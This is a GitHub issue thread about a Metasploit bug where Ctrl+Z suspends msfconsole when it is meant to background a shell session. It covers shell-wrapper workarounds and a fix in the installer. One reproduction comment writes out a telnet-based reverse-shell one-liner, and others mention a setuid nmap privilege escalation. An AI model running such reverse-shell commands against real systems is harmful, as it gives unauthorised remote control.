Cannot background command shell (non-meterpreter payloads)

[fsacer]

Steps to reproduce

How'd you do it?

1. run exploit on unix probably would be problem for windows too using normal exploit command
2. press Ctrl + Z to try to background.

Expected behavior

It should background command session without closing msfconsole.

Current behavior

It closes msfconsole. What's weird it shows do you want to background after it closes msfconsole.

System stuff

Metasploit version

metasploit v4.15.7-dev

I installed Metasploit with:

• it came with Kali

OS

Kali

PS: I can background with exploit -z but still cannot interact with shell and then background it. Is there a way to rebind background key?

Also another question I got root on vm manually using setuid nmap vuln. and command nmap --script script.txt but I couldn't get to persist it through whole command session, is there a way to do that and make meterpreter shell root. I used the setuid_nmap exploit module but that one did not work for me.

[fsacer]

As a workaround this works:

• make sh file wrapper that catches SIGSTOP where msfconsole is located:

  #!/bin/sh
  trap "" TSTP
  /usr/bin/msfconsole

• save as msfconsole.sh in /usr/bin/ directory
• chmod +x msfconsole.sh

[fsacer]

I think this can be closed for now since that was kinda fixed I guess.

[fsacer]

This still seems to be happening on with cmd/unix/reverse payload: Framework: 4.17.2-dev- Console : 4.17.2-dev-

[fsacer]

can reproduce this also for powershell and windows reverse shell payloads on v4.17.4-dev-, also this might depend on desktop manager (specifically got this to happen on LXDE now and Gnome in the past)

[usama7628674]

@fsacer I tested in gnome desktop manager.

[usama7628674]

@fsacer Okay so it does background but not in a sense that I could use meterpreter commands,upon reinteracting with session it still goes back to powershell terminal.Only powershell commands work cuz it's only powershell session.

[mbloms]

I experienced this issue today. The SIGTSTP signal is not caught. When pushing Ctrl+Z the whole process is put in the background. I can get it back by using fg, and then I can put "y" to put the session in background.

Tested with fish and bash on manjaro linux. Metasploit 4.17.5

msf exploit(linux/samba/is_known_pipename) > sessions -i 1
[*] Starting interaction with 1...

Job 1, 'msfconsole -r login.rc' has stopped

Background session 1? [y/N]  ⏎
micke@Humlan ~/D/E/f/flag_07460> fg
Send job 1, “msfconsole -r login.rc” to foreground
y
msf exploit(linux/samba/is_known_pipename) >

[jeffmcjunkin]

This normally still affects the latest msfconsole version:

msf5 > version
Framework: 5.0.35-dev-
Console  : 5.0.35-dev-

I like the workaround given above, with one tweak:

# cat /usr/local/bin/msfconsole 
#!/bin/sh
trap "" TSTP
/usr/bin/msfconsole "$@"

The "$@" part means arguments given to msfconsole will still apply (background: https://stackoverflow.com/a/4824637/372377). I also gave the wrapper script the same name, but since it's under /usr/local/bin/ (which is earlier in the $PATH) means the wrapper script is called when running msfconsole.

Since this breaks some post-exploitation functionality otherwise (there's no way to exit powershell_shell inside meterpreter, for example, without Ctrl-Z), I'd recommend Rapid7 consider solving in the released versions.

[ZeR0AbSoLu]

Got the same problem on metasploit v5.0.28-dev on archlinux , I can't background a shell/session with crtl+Z , It's background msfconsole itself.

[buneeflacs]

ok, this may or may not help anyone at this point, but I noticed Ive been having this problem when I open msf with 'msfdb run' and not 'msfconsole'. I opened msf using the console command and it backgrounds the session and not all of Metasploit... just my observation.

[sh317er]

Bringing this back from the dead to confirm @buneeflacs comments

If using 'msfdb run' it will fail. Use 'msfconsole' if you intend to use ctrl+z to background your sessions without making modifications to your msfconsole.sh file

[adfoster-r7]

I haven't been able to replicate this with msfconsole. I did replicate with msfdb run - however that code doesn't live within metasploit-framework and is currently maintained by Kali:

https://gitlab.com/kalilinux/packages/metasploit-framework/-/blob/911ae0bf28bc34effbc6ff7709aa559d0b3adfbc/debian/extra/msfdb

If there's replication steps for msfconsole this is something I can look into further

As a workaround for backgrounding msfdb run you can add:

#!/bin/sh
trap "" TSTP

To the start of /usr/bin/msfdb, but it will stop you from completely backgrounding msfconsole.

---

My replication steps for Kali and msfdb run were

Creating the cmd/unix/reverse listener + payload:

sudo msfdb run
use cmd/unix/reverse
set LHOST 127.0.0.1
generate -f raw

to_handler

Copy the stdout payload into a new shell and run it:

$ sh -c '(sleep 3602|telnet 127.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 127.0.0.1 4444 >/dev/null 2>&1 &)'

Swapping back to the previous shell and interacting with it:

msf5 payload(cmd/unix/reverse) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 22NSKBnp2W9syQws;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "22NSKBnp2W9syQws\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.222.1:4444 -> 192.168.222.130:34418) at 2020-07-29 11:05:08 +0100

msf5 payload(cmd/unix/reverse) > sessions -i 1
[*] Starting interaction with 1...

Attempting to foreground the session:

^Z
[1]+  Stopped                 sudo msfdb run
kali@kali:~$ 
Background session 1? [y/N]  y
bash: y: command not found

kali@kali:~$ 

[MathiasGoulart]

Well, I'm facing the same problem here running:

Ubuntu 20.04 TLS
MTE: 6.0.18-de-v

I could workaround that jus by switching to a non existent session:

meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > sessions 2
[*] Backgrounding session 1...
[-] Invalid session identifier: 2

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[adfoster-r7]

This is definitely still an issue, but without exact replication steps it hasn't been possible to resolve this

[label-actions[bot]]

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

• All of the item points within this tempate
• The result of the debug command in your Metasploit console
• Screenshots showing the issues you're having
• Exact replication steps

The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.

[jeffmcjunkin]

What more do you need for replication steps? I thought your steps above (https://github.com/rapid7/metasploit-framework/issues/8860#issuecomment-665577458) were enough, @adfoster-r7?

An easy example is getting any Windows meterpreter, then running load powershell followed by powershell_shell.

How does one exit that channel without Ctrl-Z (SIGTSTP) being trapped by msfconsole, so it's not handed to the underlying shell?

[qxssong]

I'm facing the same problem:

macos catalina 10.15.7 
MTE: v6.0.48-dev

Cannot background command shell, just suspended msfconsole

meterpreter > shell
Process 3700 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ��

C:\Users\test\Desktop>^Z
[1]  + 32883 suspended  msfconsole

~$

[souvikhaldar]

I am facing the same issue in kali running inside vmware fusion in Mac OS Big Sur.

[bcoles]

I am facing the same issue in kali running inside vmware fusion in Mac OS Big Sur.

Please provide steps to reproduce this issue.

[souvik-cv]

I am facing the same issue in kali running inside vmware fusion in Mac OS Big Sur.

Please provide steps to reproduce this issue.

I gained shell practising blue room of tryhackme. Then when I tried to use post module for shell to meterpreter and before that pressed Ctrl-Z, that is when I faced the issue has mentioned at top. Basically the steps mentioned in Blue room of tryhackme.

[woolcoxm]

this is happening to me in all version of metasploit for the last month.

ive installed 3 different versions of linux, installed 4 or 5 different versions of metasploit, even went back an entire version(6 to 5).

this workaruond doesnt work, i set it up and it catches the ctrl+z but doesnt let me background anything or exit.

oses ive tried Kali, Parrot OS, Ubuntu, Windows.

all linux distros were usning KDE Plasma.

Windows was windows 10 latest patches.

im stuck. any help would be lovely.

[sempervictus]

This is how i've run msfconsole since the readline wars:

#!/bin/sh
trap "" 20
export RAILS_ENV=production
export RUBYOPT="-W0"
rvmsudo /opt/metasploit4/msf4/msfconsole -q -r /home/<myusername>/.msf4/msfconsole.rc -L

seems to work fine on Arch Linux when backgrounding shells inside meterp sessions and the sessions themselves.

[bona-ws]

I experienced this issue today. The SIGTSTP signal is not caught. When pushing Ctrl+Z the whole process is put in the background. I can get it back by using fg, and then I can put "y" to put the session in background.

Tested with fish and bash on manjaro linux. Metasploit 4.17.5

msf exploit(linux/samba/is_known_pipename) > sessions -i 1
[*] Starting interaction with 1...

Job 1, 'msfconsole -r login.rc' has stopped

Background session 1? [y/N]  ⏎
micke@Humlan ~/D/E/f/flag_07460> fg
Send job 1, “msfconsole -r login.rc” to foreground
y
msf exploit(linux/samba/is_known_pipename) >

This is worked for me. Or you can easily type "background" command, it also worked for my case.

[jeffmcjunkin]

Since this doesn't seem to be fixed upstream, has multiple reports and a reproducible path, can one of the Rapid7 folk re-open and re-examine this issue? Maybe @adfoster-r7 ?

[adfoster-r7]

@jeffmcjunkin I've still had no luck replicating this with the default msfconsole with a slightly older Kali using /usr/bin/msfconsole with the default /bin/bash shell, as well as Kali 2021.2 /usr/bin/zsh

Here's the steps I was following from your comment above https://github.com/rapid7/metasploit-framework/issues/8860#issuecomment-780216352

msf6 payload(cmd/windows/reverse_powershell) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > pwd

Path
----
C:\Users\a

PS > ^Z
Background channel 1? [y/N]  y
meterpreter > 
Background session 2? [y/N]  
msf6 payload(cmd/windows/reverse_powershell) > 

My msfconsole script on Kali:

$ cat $(which msfconsole) | head -n 20
#!/usr/share/metasploit-framework/ruby
# -*- coding: binary -*-
#
# This user interface provides users with a command console interface to the
# framework.
#

require 'pathname'
begin

  # Silences warnings as they only serve to confuse end users
  if defined?(Warning) && Warning.respond_to?(:[]=)
    Warning[:deprecated] = false
  end

  # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
  require Pathname.new(__FILE__).realpath.expand_path.parent.join('config', 'boot')
  require 'msfenv'
  require 'metasploit/framework/profiler'
  require 'metasploit/framework/command/console'

If you're on a different operating system / shell / different msfconsole wrapper, let me know :+1:

[jeffmcjunkin]

@adfoster-r7 I'm using the nightly installer packages, with dependencies installed via https://github.com/trustedsec/ptf, on Ubuntu 18.04, 20.04, and Debian 10, all 64-bit.

Is the msfconsole wrapper from Kali part of the framework, or is that a custom Kali thing? That could explain why many people aren't hitting this, if it's a custom Kali thing.

[adfoster-r7]

@jeffmcjunkin Thanks! I was able to confirm that the nightly installer packages have this issue, rather than framework itself which is what I was initially testing above.

Can you check this PR out and let me know if the fix works for you? https://github.com/rapid7/metasploit-omnibus/pull/160 The easiest way to verify the fix might be to edit those lines into wherever your msfconsole is, i.e. vim $(which msfconsole)

[jeffmcjunkin]

This worked great for me, both with WSL2 / Ubuntu 20.04 on Win10, as well as on Debian 10 (buster / oldstable), both with the latest nightly installers and the manual patch. Thank you, and I'm good with closing the issue entirely.

[adfoster-r7]

A fix should be available in the next release of the nightly Rapid7 builds of Metasploit https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

[adfoster-r7]

This should be fixed by https://github.com/rapid7/metasploit-omnibus/pull/160 if you've installed Metasploit framework via the omnibus installer.

This will still be an issue with Kali's custom msfdb wrapper, as it looks like a similar fix might be needed over in their Gitlab repo. I've raised an issue for that for that over here

Closing for now :+1:

Edit: This should be fixed in Kali now too:

It should be fixed in version 6.1.37-0kali2. The package will be soon in kali-rolling

[noraj]

Similar fix needed for other distro wrappers:

• ArchLinux : https://bugs.archlinux.org/task/74915?project=5&string=metasploit
• BlackArch Linux: https://github.com/BlackArch/blackarch/issues/3438